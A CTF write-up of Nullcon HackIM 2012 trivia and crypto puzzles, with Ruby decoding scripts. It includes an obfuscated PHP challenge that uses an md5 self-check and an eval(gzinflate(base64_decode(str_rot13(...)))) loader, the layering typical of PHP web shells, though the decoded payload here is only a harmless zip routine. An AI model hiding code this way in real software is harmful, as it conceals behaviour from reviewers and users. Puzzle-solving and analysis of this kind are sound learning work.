Nullcon HackIM 2012 Solutions

Nullcon HackIM 2012 Writeup

Trivia Level 1

This operating system also refers to a 1982 science fiction film, a board game, and a song off the Prodigy B-side "What Evil Lurks".

Flag: android

Trivia Level 2

This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent.

Flag: evil bit
Reference: http://www.ietf.org/rfc/rfc3514.txt

Trivia Level 3

This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare.

Flag: 2795
Reference: http://www.ietf.org/rfc/rfc2795.txt

Trivia Level 4

Metasploit was originally coded for what purpose?

Flag: game
Reference: http://threatpost.com/en_us/blogs/qa-hd-moore-metasploit-disclosure-and-ethics-052010

Trivia Level 5

Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands.

Flag: whitespace
Reference: http://en.wikipedia.org/wiki/Whitespace_(programming_language)
Crypto Level 1: Ulta Pulta

Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lxiaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 CeaaGlyik

Clue: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->

Approach: "Recycled keyboard" being the hint, it pointed to a substitution cipher. Solved it by starting with yfi = the.

Flag: Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows, - Bill Gates

Other methods:
  1. http://www.blisstonia.com/software/WebDecrypto/index.php
  2. Reversed keyboard

Crypto Level 2: White Noise

File: http://www.nullcon.net/challenge/data/shhhkoinahihai

Approach: Initially thought it was Whitespace code. Then noticed only tabs and spaces. Wrote code to convert them to 0 and 1.

Ruby code:

    [clevel2]$ cat decode.rb
    x = gets
    l = x.size
    i = 0
    decoded = ""
    while i < l do
      case x[i]
      when "\t"            # tab -> 1 (the `when` value was lost in extraction; tab is assumed, swap with " " if the output comes out inverted)
        print "1"
        decoded = decoded + "1"
      else                 # space (and the trailing newline) -> 0
        print "0"
        decoded = decoded + "0"
      end
      i = i + 1
    end
    print "\n"
    i = 0
    # Every complete group of 8 bits is one ASCII character. The original test was
    # `i < decoded.size - 8`, which skips the final byte when the bit count is a
    # multiple of 8; that is why the output below ends in "27630" while the flag ends in "276304".
    while i + 8 <= decoded.size
      j = i + 7
      print decoded[i..j].to_i(2).chr
      i = i + 8
    end
    print "\n"

    [clevel2]$ cat shhhkoinahihai | ruby decode.rb
    010001010111001001110010011011110111001000100000010011010110010101110011011100110110000101100111011001010011101000100000010110010110111101110101011100100010000010100000110000101110011011100110111011101101111011100100110010000100000010011010111010101110011011101000010000001000010011001010010000001100001011101000010000001001100011001010110000101110011011101000010000000110001001110000011011100110111011000000100000010000110110100001100001011100100110000101100011011101000110010101110010011100110010000001100001011011100110010000100000010000110110000101101110001101111011101000010000001010010011001010111000001100101011000010111010000100000000001011011100111100100100000011011110110011000100000010110010110111101110101010001110010011001010111011001101001011011110111010101110011001000000011001100110000110110001110000011100100100000010100000110000101110011011100110111011101101111010001110011001000000010110100100000010011010101001100100000010010110100001000100001100100011011100110110001100110011000000110100
    Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 27630

Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304

Crypto Level 3: Base Test

Clue: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====

Approach: Looked like Base64. Tried Base64 and Base32 decoding. The padding in front suggested that we may need to reverse the string.

Ruby code:

    def decodeb32(string)
      hash = {
        "A" => "00000", "B" => "00001", "C" => "00010", "D" => "00011", "E" => "00100", "F" => "00101",
        "G" => "00110", "H" => "00111", "I" => "01000", "J" => "01001", "K" => "01010", "L" => "01011",
        "M" => "01100", "N" => "01101", "O" => "01110", "P" => "01111", "Q" => "10000", "R" => "10001",
        "S" => "10010", "T" => "10011", "U" => "10100", "V" => "10101", "W" => "10110", "X" => "10111",
        "Y" => "11000", "Z" => "11001", "2" => "11010", "3" => "11011", "4" => "11100", "5" => "11101",
        "6" => "11110", "7" => "11111",
        "=" => "0"      # padding is mapped to a single 0 bit, which shifts the alignment of what follows
      }
      decoded = ""
      len = string.size - 1
      (0..len).each do |i|
        print hash[string[i].chr]
        decoded = decoded + hash[string[i].chr]
      end
      print "\n"
      b32 = ""
      # Because of the "====" prefix the byte boundary is unknown, so try all 8 bit offsets
      # and read the one that comes out as text.
      (0..7).each do |s|
        i = s
        while i + 8 <= decoded.size     # was `i < decoded.size - 8`, which dropped the last byte
          j = i + 7
          print decoded[i..j].to_i(2).chr
          b32 = b32 + decoded[i..j].to_i(2).chr   # was a quoted string literal, which appended the code text instead of the character
          i = i + 8
        end
        print "\n"
      end
      return b32
    end

    string =  "====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="
    decodeb32(string)
    decodeb32(string.reverse)
    string = "MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======"
    decodeb32(string)

Flag: duoTriGeSimalandNgiti

Crypto Level 4: Elucidate

File: http://www.nullcon.net/challenge/data/elucidate
Approach: Obfuscated PHP code. Using a combination of manual effort, an irb shell, some scripting and online tools, decoded it into readable PHP code.

    [nullc0n]$ irb
    ruby-1.9.2-p180 :001 > "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
     => "base64_decode"

Therefore, after base64-decoding, we got:

    $d9917ccba06ba0e3ed151e1b9461ae76="\x62";
    $sa0eb2c28ddf13a1308bf608b5281360="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc="\x66";
    $w67426c2c6071d5516d2011022955d36="\x67";
    $jfc5943f5fa9c0dc0462fa41344f5a69="\x6d";
    $r646d5905656615ba7da86edd8fd543f="\x6f";
    $p45fdad1c8a99d58b1fe5bbec9320531="\x6f";
    $xc4b24ab8e13eb8fec317a4d1a1d6089="\x6f";
    $s751db252d0679f810556e50453d4462="\x6f";
    $d5544235a898a5b2e405374fc1ed84fc="\x73";
    $xaa4294a0bca922b2cc8b9a2789e95fa="\x73";
    $m795646e0bf98ada9720129f542f0de9="\x73";
    $e86bf7887c00ee12d8e91be11684d53d="\x73";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\141";
    $sa0eb2c28ddf13a1308bf608b5281360.="\162";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\151";
    $w67426c2c6071d5516d2011022955d36.="\172";
    $jfc5943f5fa9c0dc0462fa41344f5a69.="\144";
    $r646d5905656615ba7da86edd8fd543f.="\142";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\142";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\142";
    $s751db252d0679f810556e50453d4462.="\142";
    $d5544235a898a5b2e405374fc1ed84fc.="\164";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\164";
    $m795646e0bf98ada9720129f542f0de9.="\164";
    $e86bf7887c00ee12d8e91be11684d53d.="\164";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\x73";
    $sa0eb2c28ddf13a1308bf608b5281360.="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x6c";
    $w67426c2c6071d5516d2011022955d36.="\x69";
    $jfc5943f5fa9c0dc0462fa41344f5a69.="\x35";
    $r646d5905656615ba7da86edd8fd543f.="\x5f";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\x5f";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\x5f";
    $s751db252d0679f810556e50453d4462.="\x5f";
    $d5544235a898a5b2e405374fc1ed84fc.="\x72";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\x72";
    $m795646e0bf98ada9720129f542f0de9.="\x72";
    $e86bf7887c00ee12d8e91be11684d53d.="\x72";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\145";
    $sa0eb2c28ddf13a1308bf608b5281360.="\147";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\145";
    $w67426c2c6071d5516d2011022955d36.="\156";
    $r646d5905656615ba7da86edd8fd543f.="\145";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\145";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\147";
    $s751db252d0679f810556e50453d4462.="\163";
    $d5544235a898a5b2e405374fc1ed84fc.="\137";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\137";
    $m795646e0bf98ada9720129f542f0de9.="\160";
    $e86bf7887c00ee12d8e91be11684d53d.="\164";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\x36";
    $sa0eb2c28ddf13a1308bf608b5281360.="\x5f";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x5f";
    $w67426c2c6071d5516d2011022955d36.="\x66";
    $r646d5905656615ba7da86edd8fd543f.="\x6e";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\x6e";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\x65";
    $s751db252d0679f810556e50453d4462.="\x74";
    $d5544235a898a5b2e405374fc1ed84fc.="\x72";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\x72";
    $m795646e0bf98ada9720129f542f0de9.="\x6f";
    $e86bf7887c00ee12d8e91be11684d53d.="\x6f";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\64";
    $sa0eb2c28ddf13a1308bf608b5281360.="\162";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\147";
    $w67426c2c6071d5516d2011022955d36.="\154";
    $r646d5905656615ba7da86edd8fd543f.="\144";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\144";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\164";
    $s751db252d0679f810556e50453d4462.="\141";
    $d5544235a898a5b2e405374fc1ed84fc.="\145";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\157";
    $m795646e0bf98ada9720129f542f0de9.="\163";
    $e86bf7887c00ee12d8e91be11684d53d.="\153";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\x5f";
    $sa0eb2c28ddf13a1308bf608b5281360.="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x65";
    $w67426c2c6071d5516d2011022955d36.="\x61";
    $r646d5905656615ba7da86edd8fd543f.="\x5f";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\x5f";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\x5f";
    $s751db252d0679f810556e50453d4462.="\x72";
    $d5544235a898a5b2e405374fc1ed84fc.="\x70";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\x74";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\144";
    $sa0eb2c28ddf13a1308bf608b5281360.="\160";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\164";
    $w67426c2c6071d5516d2011022955d36.="\164";
    $r646d5905656615ba7da86edd8fd543f.="\143";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\146";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\143";
    $s751db252d0679f810556e50453d4462.="\164";
    $d5544235a898a5b2e405374fc1ed84fc.="\154";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\61";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\x65";
    $sa0eb2c28ddf13a1308bf608b5281360.="\x6c";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x5f";
    $w67426c2c6071d5516d2011022955d36.="\x65";
    $r646d5905656615ba7da86edd8fd543f.="\x6c";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\x6c";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\x6f";
    $d5544235a898a5b2e405374fc1ed84fc.="\x61";
    $xaa4294a0bca922b2cc8b9a2789e95fa.="\x33";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\143";
    $sa0eb2c28ddf13a1308bf608b5281360.="\141";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\143";
    $r646d5905656615ba7da86edd8fd543f.="\145";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\165";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\156";
    $d5544235a898a5b2e405374fc1ed84fc.="\143";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\x6f";
    $sa0eb2c28ddf13a1308bf608b5281360.="\x63";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x6f";
    $r646d5905656615ba7da86edd8fd543f.="\x61";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\x73";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\x74";
    $d5544235a898a5b2e405374fc1ed84fc.="\x65";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\144";
    $sa0eb2c28ddf13a1308bf608b5281360.="\145";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\156";
    $r646d5905656615ba7da86edd8fd543f.="\156";
    $p45fdad1c8a99d58b1fe5bbec9320531.="\150";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\145";
    $d9917ccba06ba0e3ed151e1b9461ae76.="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x74";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\x6e";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\145";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\164";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x6e";
    $xc4b24ab8e13eb8fec317a4d1a1d6089.="\x73";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\164";
    $vbc5bd6f114377e0488d6700bf89e9bc.="\x73";
    $s751db252d0679f810556e50453d4462();
    if($jfc5943f5fa9c0dc0462fa41344f5a69($sa0eb2c28ddf13a1308bf608b5281360("\x5c\50\x22\133\x30\55\x39\101\x2d\132\x61\55\x7a\134\x2b\57\x3d\135\x2a\42\x5c\51","\x28\42\x22\51",$d5544235a898a5b2e405374fc1ed84fc("\r\n","",$vbc5bd6f114377e0488d6700bf89e9bc($e86bf7887c00ee12d8e91be11684d53d(__FILE__,"\x28")))))=="\x34\64\x63\63\x36\65\x37\63\x65\145\x64\64\x37\70\x37\62\x34\142\x32\142\x38\70\x38\65\x33\66\x35\66\x61\64\x30\67"){@eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc8b9a2789e95fa("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"))));}
    $m795646e0bf98ada9720129f542f0de9($xc4b24ab8e13eb8fec317a4d1a1d6089(),"\x61\66\x31\71\x36\65\x61\62\x61\66\x66\143\x66\143\x30\71\x35\67\x62\70\x36\65\x38\144\x34\65\x30\71\x35\62\x66\65")?$r646d5905656615ba7da86edd8fd543f():$p45fdad1c8a99d58b1fe5bbec9320531();

Replace all dots ('.') by plus ('+') and paste into the irb shell:

    [nullc0n]$ irb
    ruby-1.9.2-p180 :001 > $d9917ccba06ba0e3ed151e1b9461ae76="\x62";
    $sa0eb2c28ddf13a1308bf608b5281360="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc="\x66";
    $w67426c2c6071d5516d2011022955d36="\x67";
    $jfc5943f5fa9c0dc0462fa41344f5a69="\x6d";
    $r646d5905656615ba7da86edd8fd543f="\x6f";
    $p45fdad1c8a99d58b1fe5bbec9320531="\x6f";
    $xc4b24ab8e13eb8fec317a4d1a1d6089="\x6f";
    $s751db252d0679f810556e50453d4462="\x6f";
    $d5544235a898a5b2e405374fc1ed84fc="\x73";
    $xaa4294a0bca922b2cc8b9a2789e95fa="\x73";
    $m795646e0bf98ada9720129f542f0de9="\x73";
    $e86bf7887c00ee12d8e91be11684d53d="\x73";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\141";
    $sa0eb2c28ddf13a1308bf608b5281360+="\162";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\151";
    $w67426c2c6071d5516d2011022955d36+="\172";
    $jfc5943f5fa9c0dc0462fa41344f5a69+="\144";
    $r646d5905656615ba7da86edd8fd543f+="\142";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\142";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\142";
    $s751db252d0679f810556e50453d4462+="\142";
    $d5544235a898a5b2e405374fc1ed84fc+="\164";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\164";
    $m795646e0bf98ada9720129f542f0de9+="\164";
    $e86bf7887c00ee12d8e91be11684d53d+="\164";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\x73";
    $sa0eb2c28ddf13a1308bf608b5281360+="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x6c";
    $w67426c2c6071d5516d2011022955d36+="\x69";
    $jfc5943f5fa9c0dc0462fa41344f5a69+="\x35";
    $r646d5905656615ba7da86edd8fd543f+="\x5f";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\x5f";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\x5f";
    $s751db252d0679f810556e50453d4462+="\x5f";
    $d5544235a898a5b2e405374fc1ed84fc+="\x72";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\x72";
    $m795646e0bf98ada9720129f542f0de9+="\x72";
    $e86bf7887c00ee12d8e91be11684d53d+="\x72";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\145";
    $sa0eb2c28ddf13a1308bf608b5281360+="\147";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\145";
    $w67426c2c6071d5516d2011022955d36+="\156";
    $r646d5905656615ba7da86edd8fd543f+="\145";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\145";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\147";
    $s751db252d0679f810556e50453d4462+="\163";
    $d5544235a898a5b2e405374fc1ed84fc+="\137";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\137";
    $m795646e0bf98ada9720129f542f0de9+="\160";
    $e86bf7887c00ee12d8e91be11684d53d+="\164";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\x36";
    $sa0eb2c28ddf13a1308bf608b5281360+="\x5f";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x5f";
    $w67426c2c6071d5516d2011022955d36+="\x66";
    $r646d5905656615ba7da86edd8fd543f+="\x6e";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\x6e";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\x65";
    $s751db252d0679f810556e50453d4462+="\x74";
    $d5544235a898a5b2e405374fc1ed84fc+="\x72";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\x72";
    $m795646e0bf98ada9720129f542f0de9+="\x6f";
    $e86bf7887c00ee12d8e91be11684d53d+="\x6f";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\64";
    $sa0eb2c28ddf13a1308bf608b5281360+="\162";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\147";
    $w67426c2c6071d5516d2011022955d36+="\154";
    $r646d5905656615ba7da86edd8fd543f+="\144";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\144";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\164";
    $s751db252d0679f810556e50453d4462+="\141";
    $d5544235a898a5b2e405374fc1ed84fc+="\145";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\157";
    $m795646e0bf98ada9720129f542f0de9+="\163";
    $e86bf7887c00ee12d8e91be11684d53d+="\153";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\x5f";
    $sa0eb2c28ddf13a1308bf608b5281360+="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x65";
    $w67426c2c6071d5516d2011022955d36+="\x61";
    $r646d5905656615ba7da86edd8fd543f+="\x5f";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\x5f";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\x5f";
    $s751db252d0679f810556e50453d4462+="\x72";
    $d5544235a898a5b2e405374fc1ed84fc+="\x70";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\x74";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\144";
    $sa0eb2c28ddf13a1308bf608b5281360+="\160";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\164";
    $w67426c2c6071d5516d2011022955d36+="\164";
    $r646d5905656615ba7da86edd8fd543f+="\143";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\146";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\143";
    $s751db252d0679f810556e50453d4462+="\164";
    $d5544235a898a5b2e405374fc1ed84fc+="\154";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\61";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\x65";
    $sa0eb2c28ddf13a1308bf608b5281360+="\x6c";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x5f";
    $w67426c2c6071d5516d2011022955d36+="\x65";
    $r646d5905656615ba7da86edd8fd543f+="\x6c";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\x6c";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\x6f";
    $d5544235a898a5b2e405374fc1ed84fc+="\x61";
    $xaa4294a0bca922b2cc8b9a2789e95fa+="\x33";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\143";
    $sa0eb2c28ddf13a1308bf608b5281360+="\141";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\143";
    $r646d5905656615ba7da86edd8fd543f+="\145";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\165";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\156";
    $d5544235a898a5b2e405374fc1ed84fc+="\143";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\x6f";
    $sa0eb2c28ddf13a1308bf608b5281360+="\x63";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x6f";
    $r646d5905656615ba7da86edd8fd543f+="\x61";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\x73";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\x74";
    $d5544235a898a5b2e405374fc1ed84fc+="\x65";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\144";
    $sa0eb2c28ddf13a1308bf608b5281360+="\145";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\156";
    $r646d5905656615ba7da86edd8fd543f+="\156";
    $p45fdad1c8a99d58b1fe5bbec9320531+="\150";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\145";
    $d9917ccba06ba0e3ed151e1b9461ae76+="\x65";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x74";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\x6e";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\145";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\164";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x6e";
    $xc4b24ab8e13eb8fec317a4d1a1d6089+="\x73";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\164";
    $vbc5bd6f114377e0488d6700bf89e9bc+="\x73";
    ruby-1.9.2-p180 :002 >
    ruby-1.9.2-p180 :003 > $s751db252d0679f810556e50453d4462
     => "ob_start"
    ruby-1.9.2-p180 :004 > $sa0eb2c28ddf13a1308bf608b5281360
     => "ereg_replace"
    ruby-1.9.2-p180 :005 > $jfc5943f5fa9c0dc0462fa41344f5a69
     => "md5"
    ......
    ruby-1.9.2-p180 :012 > $w67426c2c6071d5516d2011022955d36
     => "gzinflate"
    ruby-1.9.2-p180 :013 > $d9917ccba06ba0e3ed151e1b9461ae76
     => "base64_decode"
    ruby-1.9.2-p180 :021 > $xaa4294a0bca922b2cc8b9a2789e95fa
     => "str_rot13"

And so on. Therefore:

    eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc8b9a2789e95fa('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'))));
is decoded to:

    eval(gzinflate(base64_decode(str_rot13('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'))));

Decoding the rot13, we get the equivalent:

    eval(gzinflate(base64_decode(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)));

Then used http://www.tareeinternet.com/scripts/decrypt.php to decode the above and got:

    /*a61965a2a6fcfc0957b8658d450952f5*/?><?php
    function create_zip($_37c4dfe05770cbe4a45d2ae9fa96a647 = array(), $_0cd4cee5d8ae33bea2a09fe4d5698e7a = '', $_63f55f63cda9be345c1ab453ec6c8ce1 = false) {
      if (file_exists($_0cd4cee5d8ae33bea2a09fe4d5698e7a) && !$_63f55f63cda9be345c1ab453ec6c8ce1) { return false; }
      $_dc0f13e9391f28d78214c80563ebba44 = array();
      if (is_array($_37c4dfe05770cbe4a45d2ae9fa96a647)) {
        foreach ($_37c4dfe05770cbe4a45d2ae9fa96a647 as $_542895ff5fa8dcb5f39647ec91e6fe12) {
          if (file_exists($_542895ff5fa8dcb5f39647ec91e6fe12)) { $_dc0f13e9391f28d78214c80563ebba44[] = $_542895ff5fa8dcb5f39647ec91e6fe12; }
        }
      }
      if (count($_dc0f13e9391f28d78214c80563ebba44)) {
        $_57211b392140f8815d1037fc594eb460 = new ZipArchive();
        if ($_57211b392140f8815d1037fc594eb460->open($_0cd4cee5d8ae33bea2a09fe4d5698e7a, $_63f55f63cda9be345c1ab453ec6c8ce1 ? ZIPARCHIVE::OVERWRITE : ZIPARCHIVE::CREATE) !== true) { return false; }
        foreach ($_dc0f13e9391f28d78214c80563ebba44 as $_542895ff5fa8dcb5f39647ec91e6fe12) { $_57211b392140f8815d1037fc594eb460->addFile($_542895ff5fa8dcb5f39647ec91e6fe12, $_542895ff5fa8dcb5f39647ec91e6fe12); }
        $_57211b392140f8815d1037fc594eb460->close();
        $_4fa3332ef3d19e9840387434b8d28780 = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
        return file_exists($_0cd4cee5d8ae33bea2a09fe4d5698e7a);
      } else { return false; }
    }
    $_37c4dfe05770cbe4a45d2ae9fa96a647 = array("\x66\151\x6c\145\x31\56\x6a\160\x67", "\x66\151\x6c\145\x32\56\x6a\160\x67", "\x66\151\x6c\145\x33\56\x67\151\x66");
    create_zip($_37c4dfe05770cbe4a45d2ae9fa96a647, "\x6d\171\x7a\151\x70\146\x69\154\x65\56\x7a\151\x70", true);
    ?>

From the above we get the flag:

    ruby-1.9.2-p180 :001 > "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
     => "onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena"
    ruby-1.9.2-p180 :002 >

References: http://www.tareeinternet.com/scripts/decrypt.php

Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena

Crypto Level 5: Llun Saving Bank

Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data?

Clue: Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd

Approach: Initially was totally lost. Then noticed that by substituting some of the letters by the previous or next letter of the alphabet, we can get some meaningful text as follows:

"Is God willing to prevent evil,but not able? Then he is NOT Omnipotent. Is He able, but NOT willing? Then He is Malevolent. Is He Both able and Willing? Then Whence Cometh Evil? Is he Neither able Nor Willing? Then WHY call him GOD? - Epicurusongod"

Each changed letter being at a binary edit distance of one from the original, it points to steganography. Printing out the binary of both strings, found that only the least significant bit differs for certain letters, which is the standard form of steganography, especially for audio files. Writing a script, got the coded message.
Ruby code:

    crypted = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"
    orig = "Is God willing to prevent evil,but not able? Then he is NOT Omnipotent. Is He able, but NOT willing? Then He is Malevolent. Is He Both able and Willing? Then Whence Cometh Evil? Is he Neither able Nor Willing? Then WHY call him GOD? - Epicurusongod"
    len = crypted.size
    binmsg = ""
    (0..(crypted.size - 1)).each do |i|
      print "Crypted : " + crypted[i].unpack("B*").first + "\n"
